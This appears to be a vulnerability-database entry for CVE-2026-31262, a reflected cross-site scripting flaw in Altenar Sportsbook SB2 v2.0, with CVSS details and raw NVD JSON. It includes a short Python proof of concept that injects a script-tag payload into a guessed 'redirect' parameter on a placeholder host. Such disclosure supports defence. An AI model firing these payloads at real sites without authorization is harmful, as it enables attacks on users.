Security Vulnerability Report
中文
CVE-2026-31262 CVSS 6.1 MEDIUM

CVE-2026-31262

Published: 2026-04-10 15:16:24
Last Modified: 2026-04-16 20:17:53

Description

Cross Site Scripting vulnerability in Altenar Sportsbook Software Platform (SB2) v.2.0 allows a remote attacker to obtain sensitive information and execute arbitrary code via the URL parameter

CVSS Details

CVSS Score
6.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:altenar:sportsbook:2.0:*:*:*:*:*:*:* - VULNERABLE
Altenar Sportsbook Software Platform (SB2) 2.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# Proof of Concept (PoC) for CVE-2026-31262 # The vulnerability exists in the URL parameter processing. import requests target_url = "http://target-host.com/sb2/vulnerable_page" # Malicious payload to test script execution xss_payload = "<script>alert('CVE-2026-31262_PoC');</script>" # Constructing the malicious URL by injecting payload into a parameter # (Parameter name may vary based on actual implementation, here assumed as 'redirect') attack_url = f"{target_url}?redirect={xss_payload}" try: response = requests.get(attack_url) # Check if the payload is reflected unmodified in the response if xss_payload in response.text: print("[+] Vulnerability Confirmed: XSS payload reflected in response.") print(f"[+] Attack URL: {attack_url}") else: print("[-] Payload not reflected or input validation is present.") except Exception as e: print(f"Error occurred: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-31262", "sourceIdentifier": "[email protected]", "published": "2026-04-10T15:16:23.607", "lastModified": "2026-04-16T20:17:52.897", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Cross Site Scripting vulnerability in Altenar Sportsbook Software Platform (SB2) v.2.0 allows a remote attacker to obtain sensitive information and execute arbitrary code via the URL parameter"}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-200"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:altenar:sportsbook:2.0:*:*:*:*:*:*:*", "matchCriteriaId": "A3794B87-BA93-4197-AEB0-E0DB9AC56B38"}]}]}], "references": [{"url": "https://github.com/nikolas-ch/CVEs/blob/main/Altenar_SportsBook_Platform_SB2/ORtoXSS/ORtoXSS.txt", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://github.com/nikolas-ch/CVEs/tree/main/Altenar_SportsBook_Platform_SB2/ORtoXSS", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking"]}]}}